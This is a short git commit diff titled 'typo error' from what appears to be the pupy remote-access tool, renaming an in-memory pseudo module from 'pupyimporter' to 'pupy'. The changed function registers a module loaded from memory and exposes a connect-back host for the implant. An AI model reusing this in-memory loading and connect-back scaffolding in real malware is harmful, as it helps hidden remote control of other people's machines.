typo error

This commit is contained in:
n1nj4sec 2015-09-22 23:25:40 +02:00
parent db4f95af66
commit d46291147a
1 changed files with 2 additions and 2 deletions

View File

@ -71,9 +71,9 @@ def get_next_wait(attempt):
def add_pseudo_pupy_module(HOST):
if not "pupy" in sys.modules:
mod = imp.new_module("pupyimporter")
mod = imp.new_module("pupy")
mod.__name__="pupy"
mod.__file__="<memimport>\\\\pupyimporter"
mod.__file__="<memimport>\\\\pupy"
mod.__package__="pupy"
sys.modules["pupy"]=mod
mod.get_connect_back_host=(lambda : HOST)